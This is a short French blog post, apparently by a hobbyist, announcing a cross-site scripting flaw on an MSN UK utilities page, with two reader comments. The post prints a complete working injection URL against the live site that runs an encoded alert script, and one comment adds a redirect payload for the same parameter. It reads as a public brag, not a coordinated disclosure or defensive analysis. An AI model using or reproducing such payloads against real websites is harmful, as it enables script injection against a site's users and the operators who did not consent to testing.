XSS sur le site de msn UK

La gravité des failles XSS n’est plus a démontrées , Voici la faille XSS que j ‘ai trouver sur le site de MSN grand bretagne  :

http://energy.money.uk.msn.com/msn/Utilities/?cmd=%3CSCRIPT%3Ealert(String.fromCharCode(88,83,83,32,66,89,32,72,65,77,90,65,46,77,65))%3C/SCRIPT%3E

msn-xss

Tagged : ,

2 commentaires pour “XSS sur le site de msn UK”

  1. Salam
    Nice Post 😉
    walakin si on inject un script de redirection sa marche pas … alors cette faille né po a 100% exploitable regard 😉

    h**p://energy.money.uk.msn.com/msn/Utilities/?cmd= »>document.location.href= »http://www.google.com »

    Bonne continuation fréro

  2. salut wllahila bessah mazal vulenrable :d
    walakin pour les code utilsé fdak script mafhamthomch rooter serveur a si hicham :)

Laisser un Commentaire